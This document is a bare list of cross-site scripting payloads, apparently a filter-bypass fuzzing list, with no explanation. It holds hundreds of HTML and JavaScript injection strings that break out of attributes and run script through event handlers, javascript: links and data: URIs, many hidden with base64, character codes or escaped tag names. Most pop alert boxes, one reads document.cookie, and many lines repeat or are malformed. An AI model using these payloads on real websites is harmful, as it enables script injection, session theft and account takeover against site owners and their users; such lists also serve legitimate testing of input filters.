''"><script>(1)</script><iFrAme/src=jaVascRipt:prompt.valueOf()(1)+class=spider></iFramE>
jaVasCript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>
<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject
<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>
<a href=[​]"​ onmouseover=prompt(1)//">XYZ</a>
<script //>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script //
<blink/onmouseover=prompt(1)>OnMouseOver
?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
 ”/>& lt; script>alert(1)& lt;/scr ipt>”/> 
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>
<img+src=oNlY=1+ onerror="alert(['a', 'x', 'b', 'x', 'c', 's'].map(c => c.replace(/[abc]/g, '')).join(''))">
<img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
?foobar=<foo%20bar=%250a%20onclick=<your js code>
<base href="alert(1)" onfocus="a = /\/([^/]+)$/.exec(baseURI); eval(a[1]);" tabindex=1 style="display:block" autofocus></base>
"><img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><svg/onload="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><svg/onload="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1><img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">
"><iframe src="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><details open ontoggle="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><input autofocus onfocus="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><textarea autofocus onfocus="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><audio src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><video src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><marquee onstart="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><embed src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><object data="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><bgsound src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><base href="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><link rel=stylesheet href="data:text/css,body:before{content:'eval(String.fromCharCode(97,108,101,114,116,40,49,41))'}"><h1>hi</h1>
"><style>@import 'data:text/css,body:before{content:"eval(String.fromCharCode(97,108,101,114,116,40,49,41))"}';</style><h1>hi</h1>
"><isindex action="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><xmp><img src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"></xmp><h1>hi</h1>
"><noscript><p title="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"></noscript><h1>hi</h1>
"><plaintext><img src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><form action="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1></form>
"><button onclick="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1></button>
"><keygen autofocus onfocus="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1></keygen>
"><iframe src="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1></iframe>
"><script type="text/javascript">eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script><h1>hi</h1>
"><img src="data:text/html,<svg/onload=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><a href="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))">Click me</a><h1>hi</h1>
"><textarea onfocus="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1></textarea>
"><details open ontoggle="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><summary>Click me</summary><h1>hi</h1></details>
"><script>document.write('<img src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">')</script><h1>hi</h1>
"><script>document.body.innerHTML += '<img src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">';</script><h1>hi</h1>
"><script>var _=atob('YWxlcnQoMSk='),a=document.createElement('div');a.innerHTML='<h1>hi</h1>';document.body.appendChild(a);eval(_);//</script>
"><img src=x onerror="var _=atob('YWxlcnQoMSk='),a=document.createElement('div');a.innerHTML='<h1>hi</h1>';document.body.appendChild(a);eval(_);//">
"><svg/onload="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><iframe src="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><details open ontoggle="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><input autofocus onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><textarea autofocus onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><audio src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><video src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><marquee onstart="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><embed src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><object data="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><bgsound src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><base href="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><link rel=stylesheet href="data:text/css,body:before{content:'eval(atob(\'YWxlcnQoMSk=\'))'}"><h1>hi</h1>
"><style>@import 'data:text/css,body:before{content:"eval(atob(\'YWxlcnQoMSk=\'))"}';</style><h1>hi</h1>
"><isindex action="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><xmp><img src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"></xmp><h1>hi</h1>
"><noscript><p title="eval(atob('YWxlcnQoMSk='))"></noscript><h1>hi</h1>
"><plaintext><img src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><form action="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></form>
"><button onclick="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></button>
"><keygen autofocus onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></keygen>
"><iframe src="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></iframe>
"><script type="text/javascript">eval(atob('YWxlcnQoMSk='))</script><h1>hi</h1>
"><img src="data:text/html,<svg/onload=eval(atob('YWxlcnQoMSk='))>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><a href="javascript:eval(atob('YWxlcnQoMSk='))">Click me</a><h1>hi</h1>
"><textarea onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></textarea>
"><details open ontoggle="eval(atob('YWxlcnQoMSk='))"><summary>Click me</summary><h1>hi</h1></details>
"><script>document.write('<img src="data:text/html,<script>eval(atob(\'YWxlcnQoMSk=\'))</script>" onerror="eval(atob(\'YWxlcnQoMSk=\'))">')</script><h1>hi</h1>
"><script>document.body.innerHTML += '<img src="data:text/html,<script>eval(atob(\'YWxlcnQoMSk=\'))</script>" onerror="eval(atob(\'YWxlcnQoMSk=\'))">';</script><h1>hi</h1>
"><script>var _=atob('YWxlcnQoMSk='),a=document.createElement('div');a.innerHTML='<h1>hi</h1>';document.body.appendChild(a);eval(_);//</script>
"><img src=x onerror="var _=atob('YWxlcnQoMSk='),a=document.createElement('div');a.innerHTML='<h1>hi</h1>';document.body.appendChild(a);eval(_);//">
"><svg/onload="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><iframe src="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><details open ontoggle="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><input autofocus onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><textarea autofocus onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><audio src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><video src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><marquee onstart="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><embed src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><object data="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><bgsound src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><base href="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><link rel=stylesheet href="data:text/css,body:before{content:'eval(atob(\'YWxlcnQoMSk=\'))'}"><h1>hi</h1>
"><style>@import 'data:text/css,body:before{content:"eval(atob(\'YWxlcnQoMSk=\'))"}';</style><h1>hi</h1>
"><isindex action="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><xmp><img src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"></xmp><h1>hi</h1>
"><noscript><p title="eval(atob('YWxlcnQoMSk='))"></noscript><h1>hi</h1>
"><plaintext><img src="data:text/html,<script>eval(atob('YWxlcnQoMSk='))</script>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><form action="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></form>
"><button onclick="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></button>
"><keygen autofocus onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></keygen>
"><iframe src="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></iframe>
"><script type="text/javascript">eval(atob('YWxlcnQoMSk='))</script><h1>hi</h1>
"><img src="data:text/html,<svg/onload=eval(atob('YWxlcnQoMSk='))>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><a href="javascript:eval(atob('YWxlcnQoMSk='))">Click me</a><h1>hi</h1>
"><textarea onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></textarea>
"><details open ontoggle="eval(atob('YWxlcnQoMSk='))"><summary>Click me</summary><h1>hi</h1></details>
"><script>document.write('<img src="data:text/html,<script>eval(atob(\'YWxlcnQoMSk=\'))</script>" onerror="eval(atob(\'YWxlcnQoMSk=\'))">')</script><h1>hi</h1>
"><script>document.body.innerHTML += '<img src="data:text/html,<script>eval(atob(\'YWxlcnQoMSk=\'))</script>" onerror="eval(atob(\'YWxlcnQoMSk=\'))">';</script><h1>hi</h1>
"><script>var _=atob('YWxlcnQoMSk='),a=document.createElement('div');a.innerHTML='<h1>hi</h1>';document.body.appendChild(a);eval(_);//</script>
"><img src=x onerror="var _=atob('YWxlcnQoMSk='),a=document.createElement('div');a.innerHTML='<h1>hi</h1>';document.body.appendChild(a);eval(_);//">
"><svg/onload="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><iframe src="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><details open ontoggle="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><input autofocus onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><textarea autofocus onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1
"><scr\ipt>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</scr\ipt><h1>hi</h1>
"><scr\ipt>eval(atob('YWxlcnQoMSk='))</scr\ipt><h1>hi</h1>
"><img src=x onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><sv\g/onload=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><ifr\ame src="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><det\ails open ontoggle=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><inpu\t autofocus onfocus=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><text\area autofocus onfocus=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><aud\io src="data:text/html,<scr\ipt>eval(atob('YWxlcnQoMSk='))</scr\ipt>" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><vid\eo src="data:text/html,<scr\ipt>eval(atob('YWxlcnQoMSk='))</scr\ipt>" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><marqu\ee onstart=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><emb\ed src="data:text/html,<scr\ipt>eval(atob('YWxlcnQoMSk='))</scr\ipt>" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><obj\ect data="data:text/html,<scr\ipt>eval(atob('YWxlcnQoMSk='))</scr\ipt>" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><bgso\und src="data:text/html,<scr\ipt>eval(atob('YWxlcnQoMSk='))</scr\ipt>" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><bas\e href="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><lin\k rel=stylesheet href="data:text/css,body:before{content:'eval(atob('YWxlcnQoMSk='))'}"><h1>hi</h1>
"><styl\e>@import 'data:text/css,body:before{content:"eval(atob('YWxlcnQoMSk='))"}';</styl\e><h1>hi</h1>
"><xmp\><img src="data:text/html,<scr\ipt>eval(atob('YWxlcnQoMSk='))</scr\ipt>" onerror=eval(atob('YWxlcnQoMSk='))></xmp\><h1>hi</h1>
"><nosc\ript><p title="eval(atob('YWxlcnQoMSk='))"></nosc\ript><h1>hi</h1>
"><plain\text><img src="data:text/html,<scr\ipt>eval(atob('YWxlcnQoMSk='))</scr\ipt>" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><fo\rm action="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></fo\rm>
"><butt\on onclick="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></butt\on>
"><key\gen autofocus onfocus=eval(atob('YWxlcnQoMSk='))><h1>hi</h1></key\gen>
"><ifra\me src="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></ifra\me>
"><scr\ipt type="text/javascript">eval(atob('YWxlcnQoMSk='))</scr\ipt><h1>hi</h1>
"><img src="data:text/html,<sv\g/onload=eval(atob('YWxlcnQoMSk='))>" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1>
"><a href="javascript:eval(atob('YWxlcnQoMSk='))">Click me</a><h1>hi</h1>
"><te\xtarea onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1></te\xtarea>
"><det\ails open ontoggle="eval(atob('YWxlcnQoMSk='))"><summary>Click me</summary><h1>hi</h1></det\ails>
"><scr\ipt>document.write('<img src="data:text/html,<scr\ipt>eval(atob(\'YWxlcnQoMSk=\'))</scr\ipt>" onerror="eval(atob(\'YWxlcnQoMSk=\'))">')</scr\ipt><h1>hi</h1>
"><scr\ipt>document.body.innerHTML += '<img src="data:text/html,<scr\ipt>eval(atob(\'YWxlcnQoMSk=\'))</scr\ipt>" onerror="eval(atob(\'YWxlcnQoMSk=\'))">';</scr\ipt><h1>hi</h1>
"><scr\ipt>var _=atob('YWxlcnQoMSk='),a=document.createElement('div');a.innerHTML='<h1>hi</h1>';document.body.appendChild(a);eval(_);//</scr\ipt>
"><img src=x onerror="var _=atob('YWxlcnQoMSk='),a=document.createElement('div');a.innerHTML='<h1>hi</h1>';document.body.appendChild(a);eval(_);//">
"><scr\ipt>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</scr\ipt><h1>hi</h1>
"><sv\g/onload=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><ifra\me src="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><scr\ipt src="data:text/javascript,eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1></scr\ipt>
"><det\ails open ontoggle=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><inpu\t autofocus onfocus=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><text\area autofocus onfocus=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><aud\io src="data:text/html,<scr\ipt>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</scr\ipt>" onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><vid\eo src="data:text/html,<scr\ipt>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</scr\ipt>" onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><script>var _=atob('YWxlcnQoMSk='),a=document.createElement('div');a.innerHTML='<h1>hi</h1>';document.body.appendChild(a);eval(_);//</script>
"><img src=x onerror="var _=atob('YWxlcnQoMSk='),a=document.createElement('div');a.innerHTML='<h1>hi</h1>';document.body.appendChild(a);eval(_);//">
"><script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script><h1>hi</h1>
"><svg/onload=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><iframe src="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><script src="data:text/javascript,eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><details open ontoggle=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><input autofocus onfocus=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><select autofocus onfocus=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1><option></select>
"><textarea autofocus onfocus=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><svg/onload=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><math><mtext><title>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</title></mtext></math><h1>hi</h1>
"><audio src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><video src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><body onresize=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><marquee onstart=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><embed src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><object data="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><bgsound src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><base href="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><link rel=stylesheet href="data:text/css,body:before{content:'eval(String.fromCharCode(97,108,101,114,116,40,49,41))'}"><h1>hi</h1>
"><style>@import 'data:text/css,body:before{content:"eval(String.fromCharCode(97,108,101,114,116,40,49,41))"}';</style><h1>hi</h1>
"><isindex action="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><xmp><img src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))></xmp><h1>hi</h1>
"><noscript><p title="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"></noscript><h1>hi</h1>
"><plaintext><img src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><!--<svg/onload=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>--><h1>hi</h1>
"><!--<img src="data:text/html,<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>" onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>--><h1>hi</h1>
"><form action="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><button onclick="eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><keygen autofocus onfocus=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><iframe src="javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))"><h1>hi</h1>
"><script type="text/javascript">eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script><h1>hi</h1>
"><script>document.body.innerHTML='<h1>hi</h1>';</script><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><svg/onload=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><iframe src="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><script src="data:text/javascript;base64,YWxlcnQoMSk="><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><details open ontoggle=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><input autofocus onfocus=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><select autofocus onfocus=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><option></select><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><textarea autofocus onfocus=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><svg/onload=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><math><mtext><title>eval(atob('YWxlcnQoMSk='))</title></mtext></math><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><audio src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><video src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><body onresize=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><marquee onstart=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><bgsound src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><base href="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><link rel=stylesheet href="data:text/css;base64,body:before{content:'eval(atob(\"YWxlcnQoMSk=\"))'}"><h1>hi</h1></link><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><style>@import 'data:text/css;base64,body:before{content:\"eval(atob(\'YWxlcnQoMSk=\'))\"}';</style><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><isindex action="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><xmp><img src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" onerror=eval(atob('YWxlcnQoMSk='))></xmp><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><noscript><p title="eval(atob('YWxlcnQoMSk='))"></noscript><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><plaintext><img src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><svg/onload=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><!--<svg/onload=eval(atob('YWxlcnQoMSk='))>--><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><!--<img src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" onerror=eval(atob('YWxlcnQoMSk='))>--><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><form action="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><button onclick="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><keygen autofocus onfocus=eval(atob('YWxlcnQoMSk='))><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><iframe src="javascript:eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><script type="text/javascript">eval(atob('YWxlcnQoMSk='))</script><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><img src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+" onerror="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><a href="javascript:eval(atob('YWxlcnQoMSk='))">Click me</a><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><input type="text" onfocus="eval(atob('YWxlcnQoMSk='))"><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><details open ontoggle="eval(atob('YWxlcnQoMSk='))"><summary>Click me</summary><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
"><script>document.write('<img src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+" onerror="eval(atob(\'YWxlcnQoMSk=\'))">')</script><h1>hi</h1><img src=x onerror=eval(atob('YWxlcnQoMSk='))>//
